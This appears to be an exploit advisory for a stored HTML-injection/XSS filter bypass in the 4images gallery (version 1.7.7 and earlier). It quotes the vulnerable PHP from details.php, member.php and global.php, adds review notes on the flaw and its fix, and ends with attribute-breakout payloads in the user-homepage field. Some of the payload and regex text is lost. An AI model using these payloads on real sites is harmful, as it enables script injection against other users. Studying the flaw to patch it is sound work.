|| || | || o_,_7 _|| . _o_7 _|| q_|_|| o_\\\_, ( : / (_) / ( . =By: Qabandi =Email: iqa[a]hotmail.fr From Kuwait, PEACE... =Vuln: 4images <= 1.7.7 - filter bypass HTML injection/XSS =INFO: ~~~ =BUY: ~~~ =DORK: ~~~ _-=/:Conditions:\=-_ --------------------------------------------------------------------------------- ; Magic quotes for incoming GET/POST/Cookie data. magic_quotes_gpc = Off Comments allowed[+] Registration[+] Works on default 4images comments settings. XSS used works with latest FireFox browser, you can use your own code. --------------------------------------=_=--------------------------------------- _-=/:Vulnerable_Code:\=-_ --------------------------------------------------------------------------------- in "./4images/details.php" we see::--//First-Mistake//-- 380:: $comment_user_homepage = (isset($comment_row[$i][$user_table_fields['user_homepage']])) ? format_url($comment_row[$i][$user_table_fields['user_homepage']]) : ""; 381:: if (!empty($comment_user_homepage)) { //as you can see, it just grabs whatever is in the SQL database and adds it, puts it thru format_url() //which is nothing and relies on the filter when creating or editing USER_HOMEPAGE //let's take a look at what happens when updating user_homepage in "./4images/member.php":://this is what happens when UPDATING user_homepage thru the profile page 1053:: $user_homepage = (isset($HTTP_POST_VARS['user_homepage'])) ? format_url(un_htmlspecialchars(trim($HTTP_POST_VARS['user_homepage']))) : ""; //user_homepage goes thru THREE functions, let's see what they do.. 
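//format_url();
// Review note: this only normalises the scheme prefix. It does no validation
// and no escaping, so its return value is still attacker-controlled text when
// details.php later places it inside the comment's href attribute. An empty()
// value (including the string '0') is returned as ''.
function format_url($url) {
  if (empty($url)) {
    return '';
  }
  if (!preg_match("/^https?:\/\//i", $url)) {
    $url = "http://".$url;
  }
  return $url;
}
///ok cool makes sure the URL is cool

//trim() <-- built in PHP function

//un_htmlspecialchars();
// Review note: the extracted copy of this listing showed both str_replace
// arrays as '<', '>', '"', '&' (a no-op), because the entity names were
// decoded during extraction; the search array is restored here to the entity
// forms the function's name implies. Reversing HTML escaping before the value
// is stored means the database holds raw markup, and every later output site
// (details.php, line 380 above) must re-escape it itself - it does not.
function un_htmlspecialchars($text) {
  $text = str_replace(
    array('&lt;', '&gt;', '&quot;', '&amp;'),
    array('<', '>', '"', '&'),
    $text
  );
  return $text;
}
//interesting but im afraid this is another mistake Q_Q
//anyway, point is the XSS filter in GLOBAL.PHP can be bypassed
// Lets take a small look at what the script does with all vars in "./4images/global.php"::
/*
  (fragment only; the enclosing function's header is not part of this listing)
181::   // Remove really unwanted tags
182::   do {
183::     $oldstring = $string;
184::     $string = preg_replace('#<[tag pattern lost in extraction][^>]*>#i',"",$string);
185::   } while ($oldstring != $string);
186::
187::   return $string;
188:: }

  Review note: the tag-name part of the pattern on line 184 was consumed as an
  HTML tag when this page was rendered; only ']*>#i' survived, so the exact
  denylist cannot be read from this copy. Whatever it lists, this loop is a
  denylist strip applied to the raw text, not context-aware output encoding:
  a value that is later echoed unescaped inside an attribute can close that
  attribute with a double quote and the browser parses the remainder as HTML.
  Mitigation is to store the value as submitted, restrict user_homepage to an
  http/https URL with a real parser check instead of just prefixing a scheme,
  and apply htmlspecialchars(..., ENT_QUOTES) at the point of output.
*/
//Can be bypassed..
// since it looks for [tag name lost in extraction] The script will convert it to : http://www.dummy.com/">alert('qabandi') now type this :) http://">
// (the markup in the two values above was also stripped when the page was rendered)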